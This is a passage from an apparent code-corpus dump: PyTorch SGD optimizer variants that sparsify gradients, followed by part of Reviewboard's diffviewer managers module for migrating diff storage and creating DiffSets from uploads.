\begin{aligned}
v_{t+1} & = \mu * v_{t} + g_{t+1}, \\
p_{t+1} & = p_{t} - \text{lr} * v_{t+1},
\end{aligned}
where :math:`p`, :math:`g`, :math:`v` and :math:`\mu` denote the
parameters, gradient, velocity, and momentum respectively.
This is in contrast to Sutskever et. al. and
other frameworks which employ an update of the form
.. math::
\begin{aligned}
v_{t+1} & = \mu * v_{t} + \text{lr} * g_{t+1}, \\
p_{t+1} & = p_{t} - v_{t+1}.
\end{aligned}
The Nesterov version is analogously modified.
"""
def __init__(self, params, lr=required, momentum=0, dampening=0,
weight_decay=0, nesterov=False):
if lr is not required and lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(SGD, self).__init__(params, defaults)
def __setstate__(self, state):
super(SGD, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad
if weight_decay != 0:
d_p = d_p.add(p, alpha=weight_decay)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
if nesterov:
d_p = d_p.add(buf, alpha=momentum)
else:
d_p = buf
p.add_(d_p, alpha=-group['lr'])
return loss
class sparseSGD(Optimizer):
r"""Implements stochastic gradient descent (optionally with momentum).
Nesterov momentum is based on the formula from
`On the importance of initialization and momentum in deep learning`__.
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float): learning rate
momentum (float, optional): momentum factor (default: 0)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
dampening (float, optional): dampening for momentum (default: 0)
nesterov (bool, optional): enables Nesterov momentum (default: False)
Example:
>>> optimizer = torch.optim.SGD(model.parameters(), lr=0.1, momentum=0.9)
>>> optimizer.zero_grad()
>>> loss_fn(model(input), target).backward()
>>> optimizer.step()
__ http://www.cs.toronto.edu/%7Ehinton/absps/momentum.pdf
.. note::
The implementation of SGD with Momentum/Nesterov subtly differs from
Sutskever et. al. and implementations in some other frameworks.
Considering the specific case of Momentum, the update can be written as
.. math::
\begin{aligned}
v_{t+1} & = \mu * v_{t} + g_{t+1}, \\
p_{t+1} & = p_{t} - \text{lr} * v_{t+1},
\end{aligned}
where :math:`p`, :math:`g`, :math:`v` and :math:`\mu` denote the
parameters, gradient, velocity, and momentum respectively.
This is in contrast to Sutskever et. al. and
other frameworks which employ an update of the form
.. math::
\begin{aligned}
v_{t+1} & = \mu * v_{t} + \text{lr} * g_{t+1}, \\
p_{t+1} & = p_{t} - v_{t+1}.
\end{aligned}
The Nesterov version is analogously modified.
"""
def __init__(self, params, lr=required, momentum=0, dampening=0,
weight_decay=0, nesterov=False):
if lr is not required and lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(sparseSGD, self).__init__(params, defaults)
def __setstate__(self, state):
super(sparseSGD, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
# print(p.shape)
if p.grad is None:
continue
# print(p.shape)
d_p = p.grad
# print(d_p.shape)
dpsize = d_p.shape
fn = dpsize[0]
k = int(0.3 * fn)
# print(dpsize[0])
# ndp = torch.zeros(dpsize[1:],dtype = torch.long)
# print(ndp.shape)
# print(d_p.is_cuda)
#d_p = d_p.cpu()
#d_p,ind = torch.topk(d_p,k,dim = 0,largest = True)
# print(d_p.indices.shape)
# ind = d_p.indices.shape[0]
# print(d_p.val)
# ind = np.random.permutation(fn)
# print(ind)
# print(d_p.shape, ind, k)
#if
d_p[0:k] = 0
# print(d_p)
# break
# ndp = ndp.cuda()
# print(ndp.is_cuda)
# d_p = d_p.float()
#ind = ind.long()
#d_p = d_p.long()
# print(d_p)
# print(ind)
# print(ndp.type())
# print(len(d_p.shape))
# ndp[0:k] = d_p
# d_p = ndp
#d_p = ndp.scatter_(0, ind,d_p)
# if len(d_p.shape)>1:
# d_p = ndp.scatter_(0, d_p,ind)
# else:
# d_p = ndp.scatter_(0, d_p,ind)
# print(ndp.shape)
# d_p = ndp
if weight_decay != 0:
d_p = d_p.add(p, alpha=weight_decay)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
if nesterov:
d_p = d_p.add(buf, alpha=momentum)
else:
d_p = buf
p.add_(d_p, alpha=-group['lr'])
return loss
class sparserandSGD(Optimizer):
r"""Implements stochastic gradient descent (optionally with momentum).
Nesterov momentum is based on the formula from
`On the importance of initialization and momentum in deep learning`__.
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float): learning rate
momentum (float, optional): momentum factor (default: 0)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
dampening (float, optional): dampening for momentum (default: 0)
nesterov (bool, optional): enables Nesterov momentum (default: False)
Example:
>>> optimizer = torch.optim.SGD(model.parameters(), lr=0.1, momentum=0.9)
>>> optimizer.zero_grad()
>>> loss_fn(model(input), target).backward()
>>> optimizer.step()
__ http://www.cs.toronto.edu/%7Ehinton/absps/momentum.pdf
.. note::
The implementation of SGD with Momentum/Nesterov subtly differs from
Sutskever et. al. and implementations in some other frameworks.
Considering the specific case of Momentum, the update can be written as
.. math::
\begin{aligned}
v_{t+1} & = \mu * v_{t} + g_{t+1}, \\
p_{t+1} & = p_{t} - \text{lr} * v_{t+1},
\end{aligned}
where :math:`p`, :math:`g`, :math:`v` and :math:`\mu` denote the
parameters, gradient, velocity, and momentum respectively.
This is in contrast to Sutskever et. al. and
other frameworks which employ an update of the form
.. math::
\begin{aligned}
v_{t+1} & = \mu * v_{t} + \text{lr} * g_{t+1}, \\
p_{t+1} & = p_{t} - v_{t+1}.
\end{aligned}
The Nesterov version is analogously modified.
"""
def __init__(self, params, lr=required, momentum=0, dampening=0,
weight_decay=0, nesterov=False):
if lr is not required and lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(sparserandSGD, self).__init__(params, defaults)
def __setstate__(self, state):
super(sparserandSGD, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
#pdb.set_trace()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
# print(p.shape)
if p.grad is None:
continue
# print(p.shape)
d_p = p.grad
# print(d_p.shape)
dpsize = d_p.shape
# fn = dpsize[0]
# k = int(0.3 * fn)
# print(d_p)
d_p = torch.flatten(d_p)
# print(d_p.shape)
mask = torch.ones(d_p.shape)
indices = torch.randperm(mask.shape[0])
indices = indices[:int(indices.shape[0]*0.8)]
mask[indices] = 0
d_p = torch.mul(d_p,mask)
d_p = torch.reshape(d_p,dpsize)
# print(d_p)
if weight_decay != 0:
d_p = d_p.add(p, alpha=weight_decay)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
if nesterov:
d_p = d_p.add(buf, alpha=momentum)
else:
d_p = buf
p.add_(d_p, alpha=-group['lr'])
return loss
class sparsetopSGD(Optimizer):
r"""Implements stochastic gradient descent (optionally with momentum).
Nesterov momentum is based on the formula from
`On the importance of initialization and momentum in deep learning`__.
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float): learning rate
momentum (float, optional): momentum factor (default: 0)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
dampening (float, optional): dampening for momentum (default: 0)
nesterov (bool, optional): enables Nesterov momentum (default: False)
Example:
>>> optimizer = torch.optim.SGD(model.parameters(), lr=0.1, momentum=0.9)
>>> optimizer.zero_grad()
>>> loss_fn(model(input), target).backward()
>>> optimizer.step()
__ http://www.cs.toronto.edu/%7Ehinton/absps/momentum.pdf
.. note::
The implementation of SGD with Momentum/Nesterov subtly differs from
Sutskever et. al. and implementations in some other frameworks.
Considering the specific case of Momentum, the update can be written as
.. math::
\begin{aligned}
v_{t+1} & = \mu * v_{t} + g_{t+1}, \\
p_{t+1} & = p_{t} - \text{lr} * v_{t+1},
\end{aligned}
where :math:`p`, :math:`g`, :math:`v` and :math:`\mu` denote the
parameters, gradient, velocity, and momentum respectively.
This is in contrast to Sutskever et. al. and
other frameworks which employ an update of the form
.. math::
\begin{aligned}
v_{t+1} & = \mu * v_{t} + \text{lr} * g_{t+1}, \\
p_{t+1} & = p_{t} - v_{t+1}.
\end{aligned}
The Nesterov version is analogously modified.
"""
def __init__(self, params, lr=required, momentum=0, dampening=0,
weight_decay=0, nesterov=False):
if lr is not required and lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(sparsetopSGD, self).__init__(params, defaults)
def __setstate__(self, state):
super(sparsetopSGD, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
# print(p.shape)
if p.grad is None:
continue
# print(p.shape)
d_p = p.grad
# print(d_p.shape)
dpsize = d_p.shape
# fn = dpsize[0]
# k = int(0.3 * fn)
d_p = torch.flatten(d_p)
# print(d_p.shape)
# mask = torch.ones(d_p.shape).cuda()
# indices = torch.randperm(mask.shape[0])
# indices = indices[:int(indices.shape[0]/4)]
d_p = abs(d_p)
_,indices = torch.topk(d_p,3*int(d_p.shape[0]/4),dim = 0,largest = False)
d_p[indices] = 0
# d_p = torch.mul(d_p,mask)
d_p = torch.reshape(d_p,dpsize)
if weight_decay != 0:
d_p = d_p.add(p, alpha=weight_decay)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
if nesterov:
d_p = d_p.add(buf, alpha=momentum)
else:
d_p = buf
p.add_(d_p, alpha=-group['lr'])
return loss
```
|
{
"source": "jeyaprabum/Reviewboard",
"score": 2
}
|
#### File: reviewboard/diffviewer/managers.py
```python
from __future__ import unicode_literals
import bz2
import gc
import hashlib
import os
import warnings
from django.conf import settings
from django.db import models, reset_queries, connection
from django.db.models import Count, Q
from django.db.utils import IntegrityError
from django.utils.encoding import smart_unicode
from django.utils.six.moves import range
from django.utils.translation import ugettext as _
from djblets.siteconfig.models import SiteConfiguration
from reviewboard.diffviewer.differ import DiffCompatVersion
from reviewboard.diffviewer.errors import DiffTooBigError, EmptyDiffError
from reviewboard.scmtools.core import PRE_CREATION, UNKNOWN, FileNotFoundError
class FileDiffManager(models.Manager):
"""A manager for FileDiff objects.
This contains utility methods for locating FileDiffs that haven't been
migrated to use RawFileDiffData.
"""
MIGRATE_OBJECT_LIMIT = 200
def unmigrated(self):
"""Queries FileDiffs that store their own diff content."""
return self.exclude(
(Q(diff64='') | Q(diff64__isnull=True)) &
(Q(parent_diff64='') | Q(parent_diff64__isnull=True)))
def get_migration_counts(self):
"""Returns the number of items that need to be migrated.
The result is a dictionary containing a breakdown of the various
counts, and the total count of all items for display.
"""
from reviewboard.diffviewer.models import LegacyFileDiffData
unmigrated_filediffs_count = self.unmigrated().count()
legacy_fdd_count = LegacyFileDiffData.objects.count()
return {
'filediffs': unmigrated_filediffs_count,
'legacy_file_diff_data': legacy_fdd_count,
'total_count': unmigrated_filediffs_count + legacy_fdd_count,
}
def migrate_all(self, batch_done_cb=None, counts=None, batch_size=40):
"""Migrates diff content in FileDiffs to use RawFileDiffData.
This will run through all unmigrated FileDiffs and migrate them,
condensing their storage needs and removing the content from
FileDiffs.
This will return a dictionary with the result of the process.
"""
from reviewboard.diffviewer.models import LegacyFileDiffData
total_diffs_migrated = 0
total_diff_size = 0
total_bytes_saved = 0
unmigrated_filediffs = self.unmigrated()
legacy_data_items = LegacyFileDiffData.objects.all()
if counts:
unmigrated_filediffs_count = counts['filediffs']
legacy_data_items_count = counts['legacy_file_diff_data']
total_count = counts['total_count']
else:
unmigrated_filediffs_count = unmigrated_filediffs.count()
legacy_data_items_count = legacy_data_items.count()
total_count = legacy_data_items_count + unmigrated_filediffs_count
migration_tasks = (
(self._migrate_filediffs,
unmigrated_filediffs,
unmigrated_filediffs_count),
(self._migrate_legacy_fdd,
legacy_data_items,
legacy_data_items_count),
)
for migrate_func, queryset, count in migration_tasks:
for batch_info in migrate_func(queryset, count, batch_size):
total_diffs_migrated += batch_info[0]
total_diff_size += batch_info[1]
total_bytes_saved += batch_info[2]
if callable(batch_done_cb):
batch_done_cb(total_diffs_migrated, total_count)
return {
'diffs_migrated': total_diffs_migrated,
'old_diff_size': total_diff_size,
'new_diff_size': total_diff_size - total_bytes_saved,
'bytes_saved': total_bytes_saved,
}
def _migrate_legacy_fdd(self, legacy_data_items, count, batch_size):
"""Migrates data from LegacyFileDiffData to RawFileDiffData.
This will go through every LegacyFileDiffData and convert them to
RawFileDiffData entries, removing the old versions. All associated
FileDiffs are then updated to point to the new RawFileDiffData entry
instead of the old LegacyFileDiffData.
"""
from reviewboard.diffviewer.models import RawFileDiffData
cursor = connection.cursor()
legacy_data_items = legacy_data_items.annotate(
num_filediffs=Count('filediffs'),
num_parent_filediffs=Count('parent_filediffs'))
for batch in self._iter_batches(legacy_data_items, count, batch_size):
batch_total_diff_size = 0
batch_total_bytes_saved = 0
raw_fdds = []
all_diff_hashes = []
filediff_hashes = []
parent_filediff_hashes = []
for legacy_fdd in batch:
raw_fdd = RawFileDiffData.objects.create_from_legacy(
legacy_fdd, save=False)
raw_fdds.append(raw_fdd)
binary_hash = legacy_fdd.binary_hash
old_diff_size = len(legacy_fdd.get_binary_base64())
batch_total_diff_size += old_diff_size
batch_total_bytes_saved += old_diff_size - len(raw_fdd.binary)
# Update all associated FileDiffs to use the new objects
# instead of the old ones.
if legacy_fdd.num_filediffs > 0:
filediff_hashes.append(binary_hash)
if legacy_fdd.num_parent_filediffs > 0:
parent_filediff_hashes.append(binary_hash)
all_diff_hashes.append(binary_hash)
try:
# Attempt to create all the entries we want in one go.
RawFileDiffData.objects.bulk_create(raw_fdds)
except IntegrityError:
# One or more entries in the batch conflicte with an existing
# entry, meaning it was already created. We'll just need to
# operate on the contents of this batch one-by-one.
for raw_fdd in raw_fdds:
try:
raw_fdd.save()
except IntegrityError:
raw_fdd = RawFileDiffData.objects.get(
binary_hash=raw_fdd.binary_hash)
if filediff_hashes:
self._transition_hashes(cursor, 'diff_hash', filediff_hashes)
if parent_filediff_hashes:
self._transition_hashes(cursor, 'parent_diff_hash',
parent_filediff_hashes)
legacy_data_items.filter(pk__in=all_diff_hashes).delete()
yield (len(batch), batch_total_diff_size,
batch_total_bytes_saved, filediff_hashes,
parent_filediff_hashes, all_diff_hashes)
def _migrate_filediffs(self, queryset, count, batch_size):
"""Migrates old diff data from a FileDiff into a RawFileDiffData."""
for batch in self._iter_batches(queryset, count, batch_size):
batch_total_diff_size = 0
batch_total_bytes_saved = 0
for filediff in batch:
diff_size = len(filediff.get_diff64_base64())
parent_diff_size = len(filediff.get_parent_diff64_base64())
batch_total_diff_size += diff_size + parent_diff_size
diff_hash_is_new, parent_diff_hash_is_new = \
filediff._migrate_diff_data(recalculate_counts=False)
if diff_size > 0 and not diff_hash_is_new:
batch_total_bytes_saved += diff_size
if parent_diff_size > 0 and not parent_diff_hash_is_new:
batch_total_bytes_saved += parent_diff_size
yield len(batch), batch_total_diff_size, batch_total_bytes_saved
def _iter_batches(self, queryset, count, batch_size, object_limit=200):
"""Iterates through items in a queryset, yielding batches.
This will gather up to a specified number of items from a
queryset at a time, process them into batches of a specified
size, and yield them.
After each set of objects fetched from the database, garbage
collection will be forced and stored queries reset, in order to
reduce memory usage.
"""
if count == 0:
return
batch = []
for i in range(0, count, object_limit):
# Every time we work on a batch,, we're re-querying the list of
# objects. This result from the query is expected not to have any
# previously-processed objects from a yielded batch. It may,
# however, have objects we've previously seen that haven't been
# yielded in a batch yet. That's why we're indexing from the
# length of the batch to the object limit.
for item in queryset[len(batch):object_limit].iterator():
batch.append(item)
if len(batch) == batch_size:
yield batch
batch = []
# Do all we can to limit the memory usage by resetting any stored
# queries (if DEBUG is True), and force garbage collection of
# anything we may have from processing an object.
reset_queries()
gc.collect()
if batch:
yield batch
def _transition_hashes(self, cursor, hash_field_name, diff_hashes):
"""Transitions FileDiff-associated hashes to RawFileDiffData.
This queries all FileDiffs and RawFileDiffData entries referencing
the given list of diff hashes, and updates the FileDiffs to point
to those instead of the formerly-associated LegacyFileDiffDatas.
"""
from reviewboard.diffviewer.models import RawFileDiffData
legacy_hash_field_name = 'legacy_%s' % hash_field_name
# Since this is a pretty complex operation, we're going to sanity-check
# results on DEBUG setups, to help catch issues that might come up as
# this code changes.
if settings.DEBUG:
old_filediff_info = dict(
(filediff.pk, getattr(filediff, legacy_hash_field_name).pk)
for filediff in self.filter(**{
legacy_hash_field_name + '__in': diff_hashes,
})
)
else:
old_filediff_info = None
# If the database supports joins on updates, then we can craft
# a query that will massively speed up the diff transition time.
# Otherwise, we need to fall back on doing a select and then an
# update per result.
#
# The queries are different between databases (yay standards), so
# we can't be smart and do this in a generic way. We have to check
# the database types.
if connection.vendor == 'mysql':
cursor.execute(
'UPDATE %(filediff_table)s'
' INNER JOIN %(raw_fdd_table)s raw_fdd'
' ON raw_fdd.binary_hash = '
' %(filediff_table)s.%(hash_field_name)s_id'
' SET'
' raw_%(hash_field_name)s_id = raw_fdd.id,'
' %(hash_field_name)s_id = NULL'
' WHERE raw_fdd.binary_hash IN (%(diff_hashes)s)'
% {
'filediff_table': self.model._meta.db_table,
'raw_fdd_table': RawFileDiffData._meta.db_table,
'hash_field_name': hash_field_name,
'diff_hashes': ','.join(
"'%s'" % diff_hash
for diff_hash in diff_hashes
),
})
elif connection.vendor == 'postgresql':
cursor.execute(
'UPDATE %(filediff_table)s'
' SET'
' raw_%(hash_field_name)s_id = raw_fdd.id,'
' %(hash_field_name)s_id = NULL'
' FROM %(raw_fdd_table)s raw_fdd'
' WHERE'
' raw_fdd.binary_hash IN (%(diff_hashes)s) AND'
' raw_fdd.binary_hash = '
' %(hash_field_name)s_id'
% {
'filediff_table': self.model._meta.db_table,
'raw_fdd_table': RawFileDiffData._meta.db_table,
'hash_field_name': hash_field_name,
'diff_hashes': ','.join(
"'%s'" % diff_hash
for diff_hash in diff_hashes
),
})
else:
raw_fdds = RawFileDiffData.objects.filter(
binary_hash__in=diff_hashes).only('pk', 'binary_hash')
for raw_fdd in raw_fdds:
self.filter(**{
legacy_hash_field_name: raw_fdd.binary_hash
}).update(**{
hash_field_name: raw_fdd.pk,
legacy_hash_field_name: None
})
if settings.DEBUG:
new_filediff_info = dict(
(filediff.pk, getattr(filediff, hash_field_name).binary_hash)
for filediff in self.filter(pk__in=old_filediff_info.keys())
)
assert old_filediff_info == new_filediff_info
class RawFileDiffDataManager(models.Manager):
"""A custom manager for RawFileDiffData.
This provides conveniences for creating an entry based on a
LegacyFileDiffData object.
"""
def process_diff_data(self, data):
"""Processes a diff, returning the resulting content and compression.
If the content would benefit from being compressed, this will
return the compressed content and the value for the compression
flag. Otherwise, it will return the raw content.
"""
compressed_data = bz2.compress(data, 9)
if len(compressed_data) < len(data):
return compressed_data, self.model.COMPRESSION_BZIP2
else:
return data, None
def get_or_create_from_data(self, data):
binary_hash = self._hash_hexdigest(data)
processed_data, compression = self.process_diff_data(data)
return self.get_or_create(
binary_hash=binary_hash,
defaults={
'binary': processed_data,
'compression': compression,
})
def create_from_legacy(self, legacy, save=True):
processed_data, compression = self.process_diff_data(legacy.binary)
raw_file_diff_data = self.model(binary_hash=legacy.binary_hash,
binary=processed_data,
compression=compression)
raw_file_diff_data.extra_data = legacy.extra_data
if save:
raw_file_diff_data.save()
return raw_file_diff_data
def _hash_hexdigest(self, diff):
hasher = hashlib.sha1()
hasher.update(diff)
return hasher.hexdigest()
class DiffSetManager(models.Manager):
"""A custom manager for DiffSet objects.
This includes utilities for creating diffsets based on the data from form
uploads, webapi requests, and upstream repositories.
"""
# Extensions used for intelligent sorting of header files
# before implementation files.
HEADER_EXTENSIONS = ["h", "H", "hh", "hpp", "hxx", "h++"]
IMPL_EXTENSIONS = ["c", "C", "cc", "cpp", "cxx", "c++", "m", "mm", "M"]
def create_from_upload(self, repository, diff_file, parent_diff_file=None,
diffset_history=None, basedir=None, request=None,
base_commit_id=None, validate_only=False, **kwargs):
"""Create a DiffSet from a form upload.
This parses a diff and optional parent diff covering one or more files,
validates, and constructs :py:class:`DiffSets
<reviewboard.diffviewer.models.DiffSet>` and :py:class:`FileDiffs
<reviewboard.diffviewer.models.FileDiff>` representing the diff.
This can optionally validate the diff without saving anything to the
database. In this case, no value will be returned. Instead, callers
should take any result as success.
Args:
repository (reviewboard.scmtools.models.Repository):
The repository the diff applies to.
diff_file (django.core.files.uploadedfile.UploadedFile):
The diff file uploaded in the form.
parent_diff_file (django.core.files.uploadedfile.UploadedFile, optional):
The parent diff file uploaded in the form.
diffset_history (reviewboard.diffviewer.models.DiffSetHistory, optional):
The history object to associate the DiffSet with. This is
not required if using ``validate_only=True``.
basedir (unicode, optional):
The base directory to prepend to all file paths in the diff.
request (django.http.HttpRequest, optional):
The current HTTP request, if any. This will result in better
logging.
base_commit_id (unicode, optional):
The ID of the commit that the diff is based upon. This is
needed by some SCMs or hosting services to properly look up
files, if the diffs represent blob IDs instead of commit IDs
and the service doesn't support those lookups.
validate_only (bool, optional):
Whether to just validate and not save. If ``True``, then this
won't populate the database at all and will return ``None``
upon success. This defaults to ``False``.
Returns:
reviewboard.diffviewer.models.DiffSet:
The resulting DiffSet stored in the database, if processing
succeeded and ``validate_only=False``.
Raises:
reviewboard.diffviewer.errors.DiffParserError:
There was an error parsing the main diff or parent diff.
reviewboard.diffviewer.errors.DiffTooBigError:
The diff file was too big to be uploaded, based on the
configured maximum diff size in settings.
reviewboard.diffviewer.errors.EmptyDiffError:
The provided diff file did not contain any file changes.
reviewboard.scmtools.core.FileNotFoundError:
A file specified in the diff could not be found in the
repository.
reviewboard.scmtools.core.SCMError:
There was an error talking to the repository when validating
the existence of a file.
reviewboard.scmtools.git.ShortSHA1Error:
A SHA1 specified in the diff was in the short form, which
could not be used to look up the file. This is applicable only
to Git.
"""
if 'save' in kwargs:
warnings.warn('The save parameter to '
'DiffSet.objects.create_from_upload is deprecated. '
'Please set validate_only instead.',
DeprecationWarning)
validate_only = not kwargs['save']
siteconfig = SiteConfiguration.objects.get_current()
max_diff_size = siteconfig.get('diffviewer_max_diff_size')
if max_diff_size > 0:
if diff_file.size > max_diff_size:
raise DiffTooBigError(
_('The supplied diff file is too large'),
max_diff_size=max_diff_size)
if parent_diff_file and parent_diff_file.size > max_diff_size:
raise DiffTooBigError(
_('The supplied parent diff file is too large'),
max_diff_size=max_diff_size)
if parent_diff_file:
parent_diff_file_name = parent_diff_file.name
parent_diff_file_contents = parent_diff_file.read()
else:
parent_diff_file_name = None
parent_diff_file_contents = None
return self.create_from_data(
repository=repository,
diff_file_name=diff_file.name,
diff_file_contents=diff_file.read(),
parent_diff_file_name=parent_diff_file_name,
parent_diff_file_contents=parent_diff_file_contents,
diffset_history=diffset_history,
basedir=basedir,
request=request,
base_commit_id=base_commit_id,
validate_only=validate_only)
def create_from_data(self, repository, diff_file_name, diff_file_contents,
parent_diff_file_name=None,
parent_diff_file_contents=None,
diffset_history=None, basedir=None, request=None,
base_commit_id=None, check_existence=True,
validate_only=False, **kwargs):
"""Create a DiffSet from raw diff data.
This parses a diff and optional parent diff covering one or more files,
validates, and constructs :py:class:`DiffSets
<reviewboard.diffviewer.models.DiffSet>` and :py:class:`FileDiffs
<reviewboard.diffviewer.models.FileDiff>` representing the diff.
This can optionally validate the diff without saving anything to the
database. In this case, no value will be returned. Instead, callers
should take any result as success.
Args:
repository (reviewboard.scmtools.models.Repository):
The repository the diff applies to.
diff_file_name (unicode):
The filename of the main diff file.
diff_file_contents (bytes):
The contents of the main diff file.
parent_diff_file_name (unicode, optional):
The filename of the parent diff, if one is provided.
parent_diff_file_contents (bytes, optional):
The contents of the parent diff, if one is provided.
diffset_history (reviewboard.diffviewer.models.DiffSetHistory, optional):
The history object to associate the DiffSet with. This is
not required if using ``validate_only=True``.
basedir (unicode, optional):
The base directory to prepend to all file paths in the diff.
request (django.http.HttpRequest, optional):
The current HTTP request, if any. This will result in better
logging.
base_commit_id (unicode, optional):
The ID of the commit that the diff is based upon. This is
needed by some SCMs or hosting services to properly look up
files, if the diffs represent blob IDs instead of commit IDs
and the service doesn't support those lookups.
check_existence (bool, optional):
Whether to check for file existence as part of the validation
process. This defaults to ``True``.
validate_only (bool, optional):
Whether to just validate and not save. If ``True``, then this
won't populate the database at all and will return ``None``
upon success. This defaults to ``False``.
Returns:
reviewboard.diffviewer.models.DiffSet:
The resulting DiffSet stored in the database, if processing
succeeded and ``validate_only=False``.
Raises:
reviewboard.diffviewer.errors.DiffParserError:
There was an error parsing the main diff or parent diff.
reviewboard.diffviewer.errors.EmptyDiffError:
The provided diff file did not contain any file changes.
reviewboard.scmtools.core.FileNotFoundError:
A file specified in the diff could not be found in the
repository.
reviewboard.scmtools.core.SCMError:
There was an error talking to the repository when validating
the existence of a file.
reviewboard.scmtools.git.ShortSHA1Error:
A SHA1 specified in the diff was in the short form, which
could not be used to look up the file. This is applicable only
to Git.
"""
from reviewboard.diffviewer.diffutils import convert_to_unicode
from reviewboard.diffviewer.models import FileDiff
if 'save' in kwargs:
warnings.warn('The save parameter to '
'DiffSet.objects.create_from_data is deprecated. '
'Please set validate_only instead.',
DeprecationWarning)
validate_only = not kwargs['save']
tool = repository.get_scmtool()
parser = tool.get_parser(diff_file_contents)
files = list(self._process_files(
parser,
basedir,
repository,
base_commit_id,
request,
check_existence=check_existence and not parent_diff_file_contents))
# Parse the diff
if len(files) == 0:
raise EmptyDiffError(_("The diff file is empty"))
# Sort the files so that header files come before implementation.
files.sort(cmp=self._compare_files, key=lambda f: f.origFile)
# Parse the parent diff
parent_files = {}
# This is used only for tools like Mercurial that use atomic changeset
# IDs to identify all file versions but not individual file version
# IDs.
parent_commit_id = None
if parent_diff_file_contents:
diff_filenames = set([f.origFile for f in files])
parent_parser = tool.get_parser(parent_diff_file_contents)
# If the user supplied a base diff, we need to parse it and
# later apply each of the files that are in the main diff
for f in self._process_files(parent_parser, basedir,
repository, base_commit_id, request,
check_existence=check_existence,
limit_to=diff_filenames):
parent_files[f.newFile] = f
# This will return a non-None value only for tools that use
# commit IDs to identify file versions as opposed to file revision
# IDs.
parent_commit_id = parent_parser.get_orig_commit_id()
diffset = self.model(
name=diff_file_name, revision=0,
basedir=basedir,
history=diffset_history,
repository=repository,
diffcompat=DiffCompatVersion.DEFAULT,
base_commit_id=base_commit_id)
if not validate_only:
diffset.save()
encoding_list = repository.get_encoding_list()
filediffs = []
for f in files:
parent_file = None
orig_rev = None
parent_content = b''
if f.origFile in parent_files:
parent_file = parent_files[f.origFile]
parent_content = parent_file.data
orig_rev = parent_file.origInfo
